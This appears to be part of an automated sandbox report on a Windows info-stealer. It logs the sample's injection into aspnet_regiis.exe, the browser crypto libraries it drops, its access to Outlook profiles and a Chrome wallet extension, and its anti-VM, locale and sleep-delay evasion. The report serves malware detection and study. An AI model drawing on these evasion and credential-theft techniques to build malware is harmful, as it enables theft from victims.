                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: version.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                        Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeUnpacked PE file: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.750000.0.unpack A7B&<U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: section name: A7B&<U
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: section name:
                        Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                        Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_0077AF75 push edi; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2F06C pushad ; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2F1D2 pushad ; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC35B94 push ecx; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC53AB5 push ecx; ret
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027676B5 push ecx; ret
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2DB536 push ecx; ret
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: section name: A7B&<U entropy: 7.998974089724877
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe PID: 7520, type: MEMORYSTR
                        Found evasive API chain (may stop execution after checking locale)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 28E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 2B00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 2940000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 5140000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 6140000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 6270000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 7270000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 76C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 86C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMemory allocated: 96C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI coverage: 6.4 %
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027647B0 GetSystemInfo,wsprintfA,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC2A87A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
